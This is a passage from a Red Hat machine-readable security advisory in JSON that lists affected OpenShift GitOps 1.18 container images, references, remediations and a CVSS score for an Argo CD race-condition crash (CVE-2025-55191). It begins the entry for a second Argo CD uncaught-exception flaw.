"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-55191"
},
{
"category": "external",
"summary": "RHBZ#2400562",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400562"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-55191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55191"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/701bc50d01c752cad96185f848088d287a97c7b7",
"url": "https://github.com/argoproj/argo-cd/commit/701bc50d01c752cad96185f848088d287a97c7b7"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/pull/6103",
"url": "https://github.com/argoproj/argo-cd/pull/6103"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-g88p-r42r-ppp9",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-g88p-r42r-ppp9"
}
],
"release_date": "2025-09-30T22:52:19.838000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-15T10:27:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:18093"
},
{
"category": "workaround",
"details": "Systems may be configured to automatically restart a service upon crash and doing so may partially mitigate the availability impact of this vulnerability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd/v2: github.com/argoproj/argo-cd/v3: Argo CD race condition leading to crash"
},
{
"cve": "CVE-2025-59531",
"cwe": {
"id": "CWE-248",
"name": "Uncaught Exception"
},
"discovery_date": "2025-10-01T21:03:46.509567+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
